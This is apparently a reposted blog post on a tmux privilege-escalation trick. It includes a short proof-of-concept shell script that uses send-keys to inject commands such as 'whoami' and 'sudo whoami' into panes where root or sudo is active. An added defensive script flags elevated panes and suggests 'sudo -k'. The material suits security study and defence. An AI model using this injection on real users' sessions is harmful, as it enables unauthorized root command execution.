tmux Privilege Escalation
source link: https://www.tuicool.com/articles/7Jnm2ya
tmux privilege escalation abusing send-keys
A script run as a regular user inside tmux can, under some circumstances, execute commands as root.
tl;dr
Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.
send-keys
There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c'
for example, sends Ctrl-C, and with it SIGINT, to whatever is running in pane $pane.
man tmux
When I saw the send-keys feature, I was like:
"What if there's another pane, where the user is logged in as root?"
poc||gtfo
preparations
tmux
tmux sp
su # login as root
Now go back to the other tmux pane (where you are logged in as user).
action
Now run the following script to execute whoami in every pane:
#!/bin/sh
# Send Ctrl-C, then whoami followed by Enter, to every pane in the current window.
for pane in `tmux list-panes | grep -Po '^\d'`; do
    tmux send-keys -t $pane 'C-c'
    tmux send-keys -t $pane 'whoami' Enter
done;
You will see, as expected, the command whoami returned root.
sudo
With the same trick you can abuse the fact that sudo was used in another pane.
tmux send-keys -t $pane 'sudo whoami' Enter
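From the defender's side, a root shell left open in a pane shows up as a process with a different uid on that pane's tty. The script below is an added example, not part of the original article; it flags such panes, and the function names and the sample pane and process listings are constructed for illustration.

```shell
#!/bin/sh
# Added example: list tmux panes whose tty carries a process owned by a
# different uid than the tmux user (e.g. a root shell started with su).

# flag_elevated_panes OWNER_UID PANES_FILE PS_FILE
#   PANES_FILE: "pane_id tty" lines (tmux list-panes -a -F '#{pane_id} #{pane_tty}')
#   PS_FILE:    "uid tty pid comm" lines (ps -A -o uid=,tty=,pid=,comm=)
flag_elevated_panes() {
    awk -v owner="$1" '
        # First file: remember which tty belongs to which pane.
        NR == FNR { sub("^/dev/", "", $2); pane[$2] = $1; next }
        # Second file: report foreign-uid processes on a pane tty.
        ($2 in pane) && $1 != owner {
            print pane[$2], "uid=" $1, "pid=" $3, $4
        }
    ' "$2" "$3"
}

# Constructed sample data (not captured from a real system): pane %1 holds
# a root shell started via su, pane %0 is an ordinary user pane.
sample_run() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/panes" <<'EOF'
%0 /dev/pts/2
%1 /dev/pts/3
EOF
    cat > "$dir/ps" <<'EOF'
 1000 pts/2     4101 sh
 1000 pts/3     4150 sh
    0 pts/3     4188 su
    0 pts/3     4189 sh
    0 ?          812 sshd
EOF
    flag_elevated_panes 1000 "$dir/panes" "$dir/ps"
    rm -rf "$dir"
}

# Live audit of the running tmux server: sh script.sh --live
if [ "${1:-}" = "--live" ]; then
    tmp=$(mktemp -d) || exit 1
    tmux list-panes -a -F '#{pane_id} #{pane_tty}' > "$tmp/panes"
    ps -A -o uid=,tty=,pid=,comm= > "$tmp/ps"
    flag_elevated_panes "$(id -u)" "$tmp/panes" "$tmp/ps"
    rm -rf "$tmp"
fi
```

The cached-sudo variant leaves no root process for this check to find; running `sudo -k` in a pane after use drops the cached credential.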